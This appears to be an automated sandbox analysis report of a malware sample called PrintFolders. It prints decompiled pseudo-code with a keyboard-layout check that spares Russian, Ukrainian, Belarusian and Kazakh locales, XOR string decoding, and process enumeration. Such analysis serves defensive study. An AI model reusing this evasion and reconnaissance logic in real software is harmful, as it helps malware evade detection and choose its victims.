															if(_t183 != 0) {
																__imp__K32GetModuleBaseNameA(_t279, _v292,  &_v284, 0x104); // executed
															}
														}
														FindCloseChangeNotification(_t279); // executed
														_t249 =  &_v284;
														 *_t271 = 0;
														_t271[4] = 0;
														_t264 = _t249 + 1;
														_t271[5] = 0xf;
														 *_t271 = 0;
														do {
															_t177 =  *_t249;
															_t249 = _t249 + 1;
															__eflags = _t177;
														} while (_t177 != 0);
														E004026B0(_t223, _t271,  &_v284, _t249 - _t264);
														_pop(_t272);
														__eflags = _v24 ^ _t288;
														_pop(_t280);
														return E0040EBBF(_t271, _t223, _v24 ^ _t288, _t264, _t272, _t280);
													} else {
														goto L29;
													}
												}
											}
											goto L61;
											L39:
											_t222 = _v88;
											_t269 = _t269 + 0x1c;
											_t281 = _v96;
											__eflags = _t269 - _v92;
										} while (_t269 != _v92);
										_t269 = _v52;
										goto L41;
									}
								} else {
									goto L10;
								}
							}
						}
						goto L61;
						L11:
						_t267 = _t267 + 1;
					} while (_t267 < _v1568);
					goto L12;
				}
				L61:
			}

0x00404d40
0x00404d41
0x00404d49
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00000000
0x00404df0
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000400,?,7BD02EAD), ref: 00404DD8
GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D
__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

|[]], xrefs: 00404F7D
GO@., xrefs: 00404F84
|[]]GO@., xrefs: 00404FC6

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterInfoInit_thread_footerKeyboardLayoutLeaveListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 4140350330-2383573185
Opcode ID: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
Instruction ID: 94e34afb144a66a85c58054fe8ab4e0848c0f8c8b7af94ec091aa244651e6c2c
Opcode Fuzzy Hash: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
Instruction Fuzzy Hash: 7EE1C371D002598BDB14CF68CC847EEBBB1EF49314F14466AE405B72C2DB79AA84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404F20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00404F20(void* __ebx, void* __eflags) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				char _v68;
				char _v69;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				int _v108;
				signed int _v132;
				char _v272;
				char _v276;
				char _v280;
				char _v382;
				short _v384;
				int* _v400;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t86;
				signed int _t87;
				intOrPtr _t90;
				intOrPtr _t99;
				signed int _t105;
				short _t107;
				signed int _t112;
				signed int _t118;
				signed char _t124;
				signed char* _t125;
				void* _t130;
				int _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				int _t143;
				void* _t147;
				signed int _t155;
				int _t156;
				void* _t157;
				char* _t159;
				signed int _t169;
				intOrPtr* _t170;
				signed char _t176;
				long _t180;
				void* _t184;
				signed char* _t185;
				intOrPtr _t187;
				void* _t188;
				int* _t189;
				void* _t190;
				char _t191;
				void* _t192;
				intOrPtr _t193;
				void* _t195;
				void* _t196;
				intOrPtr _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				signed int _t202;

				_push(0xffffffff);
				_push(0x42c5b5);
				_push( *[fs:0x0]);
				_t201 = _t200 - 0x5c;
				_t86 =  *0x43d054; // 0x7bd02ead
				_t87 = _t86 ^ _t198;
				_v20 = _t87;
				_push(__ebx);
				_push(_t191);
				_push(_t87);
				 *[fs:0x0] =  &_v16;
				_t155 = 0;
				_t159 =  &_v40;
				asm("xorps xmm0, xmm0");
				_v76 = 0;
				asm("movq [ebp-0x24], xmm0");
				_v32 = 0;
				E00404D40(0, _t159); // executed
				_v8 = 0;
				_t90 = _v36;
				_t187 = _v40;
				_v80 = _t90;
				if(_t187 == _t90) {
					L27:
					_t156 = 0;
					goto L28;
				} else {
					_v28 = 0x5d5d5b7c;
					_v24 = 0x2e404f47;
					_t197 =  *((intOrPtr*)( *[fs:0x2c]));
					_v84 = _t197;
					do {
						E0040BB90(_t155,  &_v68, _t180, _t187, _t187);
						_v44 =  *((intOrPtr*)(_t187 + 0x18));
						_v8 = 1;
						_t123 =  *0x451008;
						if( *0x451008 >  *((intOrPtr*)(_t197 + 4))) {
							E0040EF48(_t123, 0x451008);
							_t201 = _t201 + 4;
							_t210 =  *0x451008 - 0xffffffff;
							if( *0x451008 == 0xffffffff) {
								_t18 =  &_v28; // 0x5d5d5b7c
								 *0x450d20 =  *_t18;
								_t19 =  &_v24; // 0x2e404f47
								 *0x450d24 =  *_t19;
								E0040F25B( &_v68, _t210, 0x42cee0);
								E0040EEFE(0x451008);
								_t201 = _t201 + 8;
							}
						}
						_t124 =  *0x450d27; // 0x0
						if(_t124 != 0) {
							 *0x450d20 =  *0x450d20 ^ 0x0000002e;
							 *0x450d21 =  *0x450d21 ^ 0x0000002e;
							 *0x450d22 =  *0x450d22 ^ 0x0000002e;
							 *0x450d23 =  *0x450d23 ^ 0x0000002e;
							 *0x450d24 =  *0x450d24 ^ 0x0000002e;
							 *0x450d25 =  *0x450d25 ^ 0x0000002e;
							 *0x450d26 =  *0x450d26 ^ 0x0000002e;
							 *0x450d27 = _t124 ^ 0x0000002e;
						}
						_t125 = 0x450d20;
						_v108 = 0;
						_v92 = 0;
						_v88 = 0xf;
						_t23 =  &(_t125[1]); // 0x450d21
						_t185 = _t23;
						do {
							_t176 =  *_t125;
							_t125 =  &(_t125[1]);
						} while (_t176 != 0);
						E004026B0(_t155,  &_v108, 0x450d20, _t125 - _t185);
						_t191 = _v68;
						_t180 = _v52;
						_v76 = _t155 | 0x00000001;
						_t156 = _v108;
						_t129 =  >=  ? _t156 :  &_v108;
						_t159 =  >=  ? _t191 :  &_v68;
						_t130 = E00402890(_t159, _t180, _t159,  >=  ? _t156 :  &_v108, _v92);
						_t201 = _t201 + 0xc;
						if(_t130 != 0xffffffff) {
							L11:
							_v69 = 1;
						} else {
							_t180 = _v52;
							_t159 =  >=  ? _t191 :  &_v68;
							_t147 = E00402890(_t159, _t180, _t159, 0x439a6c, 7);
							_t201 = _t201 + 0xc;
							_v69 = 0;
							if(_t147 != 0xffffffff) {
								goto L11;
							}
						}
						_v76 = _v76 & 0xfffffffe;
						_t131 = _v88;
						if(_t131 < 0x10) {
							L16:
							if(_v69 != 0) {
								L32:
								_t132 = _v48;
								__eflags = _t132 - 0x10;
								if(_t132 < 0x10) {
									L36:
									_t187 = _v40;
									_t156 = 1;
									L28:
									if(_t187 == 0) {
										L38:
										 *[fs:0x0] = _v16;
										_pop(_t188);
										_pop(_t192);
										_pop(_t157);
										return E0040EBBF(_t156, _t157, _v20 ^ _t198, _t180, _t188, _t192);
									} else {
										_push(_t159);
										E0040D380(_t187, _v36, _t187, _t191);
										_t193 = _v40;
										_t202 = _t201 + 4;
										_t180 = (0x92492493 * (_v32 - _t193) >> 0x20) + _v32 - _t193 >> 4;
										_t99 = _t193;
										_t169 = ((_t180 >> 0x1f) + _t180) * 8 - (_t180 >> 0x1f) + _t180 << 2;
										if(_t169 < 0x1000) {
											L37:
											_push(_t169);
											E0040EDFF(_t193);
											goto L38;
										} else {
											_t193 =  *((intOrPtr*)(_t193 - 4));
											_t169 = _t169 + 0x23;
											if(_t99 - _t193 + 0xfffffffc > 0x1f) {
												E00413527(_t156, _t180, __eflags);
												goto L40;
											} else {
												goto L37;
											}
										}
									}
								} else {
									_t65 = _t132 + 1; // 0x11
									_t159 = _t65;
									_t133 = _t191;
									__eflags = _t159 - 0x1000;
									if(_t159 < 0x1000) {
										L35:
										_push(_t159);
										E0040EDFF(_t191);
										_t201 = _t201 + 8;
										goto L36;
									} else {
										_t193 =  *((intOrPtr*)(_t191 - 4));
										_t169 = _t159 + 0x23;
										__eflags = _t133 - _t193 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L40;
										} else {
											goto L35;
										}
									}
								}
							} else {
								_t137 = _v44;
								if(_t137 == 0x419 || _t137 == 0x422 || _t137 == 0x423 || _t137 == 0x43f) {
									goto L32;
								} else {
									_v8 = 0;
									_t138 = _v48;
									if(_t138 < 0x10) {
										goto L25;
									} else {
										_t49 = _t138 + 1; // 0x11
										_t159 = _t49;
										_t139 = _t191;
										if(_t159 < 0x1000) {
											L24:
											_push(_t159);
											E0040EDFF(_t191);
											_t201 = _t201 + 8;
											goto L25;
										} else {
											_t193 =  *((intOrPtr*)(_t191 - 4));
											_t169 = _t159 + 0x23;
											if(_t139 - _t193 + 0xfffffffc > 0x1f) {
												goto L40;
											} else {
												goto L24;
											}
										}
									}
								}
							}
						} else {
							_t42 = _t131 + 1; // 0x11
							_t159 = _t42;
							_t143 = _t156;
							if(_t159 < 0x1000) {
								L15:
								_push(_t159);
								E0040EDFF(_t156);
								_t191 = _v68;
								_t201 = _t201 + 8;
								goto L16;
							} else {
								_t156 =  *(_t156 - 4);
								_t169 = _t159 + 0x23;
								if(_t143 - _t156 + 0xfffffffc > 0x1f) {
									L40:
									E00413527(_t156, _t180, __eflags);
									asm("int3");
									asm("int3");
									_push(_t198);
									_t199 = _t202;
									_t105 =  *0x43d054; // 0x7bd02ead
									_v132 = _t105 ^ _t199;
									_push(_t193);
									_push(_t187);
									_t189 = _t169;
									_v400 = _t189;
									_v400 = _t189;
									_t107 =  *0x439a7c; // 0x3e
									asm("movq xmm0, [0x439a74]");
									_v384 = _t107;
									asm("movq [ebp-0x108], xmm0");
									E00410B00(_t189,  &_v382, 0, 0xfa);
									_t195 = OpenProcess(0x410, 0, _t180);
									__eflags = _t195;
									if(_t195 != 0) {
										_t118 =  &_v280;
										__imp__K32EnumProcessModules(_t195, _t118, 4,  &_v276); // executed
										__eflags = _t118;
										if(_t118 != 0) {
											__imp__K32GetModuleBaseNameA(_t195, _v280,  &_v272, 0x104); // executed
										}
									}
									FindCloseChangeNotification(_t195); // executed
									_t170 =  &_v272;
									 *_t189 = 0;
									_t189[4] = 0;
									_t184 = _t170 + 1;
									_t189[5] = 0xf;
									 *_t189 = 0;
									do {
										_t112 =  *_t170;
										_t170 = _t170 + 1;
										__eflags = _t112;
									} while (_t112 != 0);
									E004026B0(_t156, _t189,  &_v272, _t170 - _t184);
									_pop(_t190);
									__eflags = _v12 ^ _t199;
									_pop(_t196);
									return E0040EBBF(_t189, _t156, _v12 ^ _t199, _t184, _t190, _t196);
								} else {
									goto L15;
								}
							}
						}
						goto L47;
						L25:
						_t155 = _v76;
						_t187 = _t187 + 0x1c;
						_t197 = _v84;
					} while (_t187 != _v80);
					_t187 = _v40;
					goto L27;
				}
				L47:
			}

0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f71
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405062
0x0040506a
0x00405070
0x0040507d
0x00405080
0x00405083
0x0040508b
0x0040508f
0x00405094
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050d0
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x00405112
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000

APIs

Part of subcall function 00404D40: GetKeyboardLayoutList.USER32(00000400,?,7BD02EAD), ref: 00404DD8
Part of subcall function 00404D40: GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

|[]], xrefs: 00404F7D
GO@., xrefs: 00404F84
|[]]GO@., xrefs: 00404FC6

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInfoInit_thread_footerKeyboardLayoutListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 960455753-2383573185
Opcode ID: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
Instruction ID: 3f3761a2ce6209ac4365e9edb3218e4554d877b29476edc6aaeebbc4e421452e
Opcode Fuzzy Hash: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
Instruction Fuzzy Hash: F581B375D002598BDB14DFA8D8857AFBBB0EF09314F54027AE401BB3D2D778A948CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405350 Relevance: 6.1, APIs: 4, Instructions: 80
processCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00405350(void* __ebx, int* _a4, long _a24) {
				signed int _v8;
				signed int _v12;
				char _v272;
				void* _v308;
				signed int _v340;
				int* _v604;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t25;
				int _t27;
				int* _t31;
				signed int _t36;
				signed int _t39;
				void* _t49;
				int _t51;
				void* _t53;
				void* _t54;
				int* _t57;
				intOrPtr* _t58;
				long _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				int* _t72;
				void* _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;

				_t23 =  *0x43d054; // 0x7bd02ead
				_v8 = _t23 ^ _t74;
				_push(__ebx);
				_push(_t65);
				_t25 = CreateToolhelp32Snapshot(0xf, 0); // executed
				_t70 = _t25;
				_v308 = 0x128;
				_t27 = Process32First(_t70,  &_v308); // executed
				if(_t27 == 0) {
					L4:
					FindCloseChangeNotification(_t70); // executed
					_t53 = 0;
				} else {
					_t65 = Process32Next;
					while(1) {
						_t47 =  >=  ? _a4 :  &_a4;
						_t49 = E004101E0( &_v272,  >=  ? _a4 :  &_a4);
						_t76 = _t76 + 8;
						if(_t49 != 0) {
							break;
						}
						_t51 = Process32Next(_t70,  &_v308); // executed
						if(_t51 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t53 = 1;
				}
				L5:
				_t63 = _a24;
				if(_t63 < 0x10) {
					L11:
					_pop(_t66);
					_pop(_t71);
					_pop(_t54);
					return E0040EBBF(_t53, _t54, _v8 ^ _t74, _t63, _t66, _t71);
				} else {
					_t57 = _a4;
					_t63 = _t63 + 1;
					_t31 = _t57;
					if(_t63 < 0x1000) {
						L10:
						_push(_t63);
						E0040EDFF(_t57);
						goto L11;
					} else {
						_t57 =  *(_t57 - 4);
						_t63 = _t63 + 0x23;
						if(_t31 - _t57 + 0xfffffffc > 0x1f) {
							E00413527(_t53, _t63, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t74);
							_t75 = _t76;
							_t36 =  *0x43d054; // 0x7bd02ead
							_v340 = _t36 ^ _t75;
							_push(_t70);
							_push(_t65);
							_t72 = _t57;
							_v604 = _t72;
							_v604 = _t72;
							_t67 = OpenProcess(0x410, 0, _t63);
							__eflags = _t67;
							if(_t67 != 0) {
								__imp__K32GetModuleFileNameExA(_t67, 0,  &_v272, 0x104); // executed
								FindCloseChangeNotification(_t67); // executed
							}
							_t58 =  &_v272;
							 *_t72 = 0;
							_t72[4] = 0;
							_t64 = _t58 + 1;
							_t72[5] = 0xf;
							 *_t72 = 0;
							do {
								_t39 =  *_t58;
								_t58 = _t58 + 1;
								__eflags = _t39;
							} while (_t39 != 0);
							E004026B0(_t53, _t72,  &_v272, _t58 - _t64);
							_pop(_t68);
							__eflags = _v12 ^ _t75;
							_pop(_t73);
							return E0040EBBF(_t72, _t53, _v12 ^ _t75, _t64, _t68, _t73);
						} else {
							goto L10;
						}
					}
				}
			}

0x00405359
0x00405360
0x00405363
0x00405365
0x0040536a
0x00405370
0x00405372
0x00405384
0x0040538c
0x004053c1
0x004053c2
0x004053c8
0x0040538e
0x0040538e
0x00405394
0x0040539b
0x004053a7
0x004053ac
0x004053b1
0x00000000
0x00000000
0x004053bb
0x004053bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053bf
0x004053f2
0x004053f2
0x004053ca
0x004053ca
0x004053d0
0x00405400
0x00405405
0x00405406
0x00405409
0x00405412
0x004053d2
0x004053d2
0x004053d5
0x004053d6
0x004053de
0x004053f6
0x004053f6
0x004053f8
0x00000000
0x004053e0
0x004053e0
0x004053e3
0x004053ee
0x00405413
0x00405418
0x00405419
0x0040541a
0x0040541b
0x0040541c
0x0040541d
0x0040541e
0x0040541f
0x00405420
0x00405421
0x00405429
0x00405430
0x00405433
0x00405434
0x00405436
0x0040543a
0x00405445
0x00405451
0x00405453
0x00405455
0x00405466
0x0040546d
0x0040546d
0x00405473
0x00405479
0x0040547f
0x00405486
0x00405489
0x00405490
0x00405493
0x00405493
0x00405495
0x00405496
0x00405496
0x004054a6
0x004054b0
0x004054b1
0x004054b3
0x004054bc
0x004053f0
0x00000000
0x004053f0
0x004053ee
0x004053de

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040536A
Process32First.KERNEL32(00000000,00000128), ref: 00405384
Process32Next.KERNEL32 ref: 004053BB
FindCloseChangeNotification.KERNEL32(00000000,?,?), ref: 004053C2

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
Instruction ID: 5e486a24114f457a1f86916b08eb67cf77cbee6b56fc5b3387bb74bba5914992
Opcode Fuzzy Hash: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
Instruction Fuzzy Hash: 7C21F031200118ABDB20DF26DD45BEF37A9EB45345F50057AE805E6281EB78DA82CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417BAF Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00417BAF(int _a4) {
				void* _t14;

				if(E0042041F(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00417BF1(_t14, _a4);
				ExitProcess(_a4);
			}

0x00417bbc
0x00417bd8
0x00417bd8
0x00417be1
0x00417bea

APIs

GetCurrentProcess.KERNEL32(0041CC1F,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD1
TerminateProcess.KERNEL32(00000000,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD8
ExitProcess.KERNEL32 ref: 00417BEA

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
